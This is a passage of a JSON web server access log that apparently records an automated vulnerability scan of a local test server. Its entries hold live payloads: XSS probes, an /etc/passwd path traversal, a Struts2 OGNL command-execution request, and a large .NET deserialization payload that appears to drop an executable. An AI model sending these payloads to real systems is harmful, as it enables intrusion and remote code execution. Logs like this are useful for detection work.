HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/CI.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zm/?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redir=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/workreap-temp/29KD1rzKGMyBwDk4UPyJTg9xe0p.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bash_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?next_file=debug.htm&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"amty_hidden=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vkd/GetWelcomeScreen.event HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v3/settings/first-login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tool/view/phpinfo.view.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 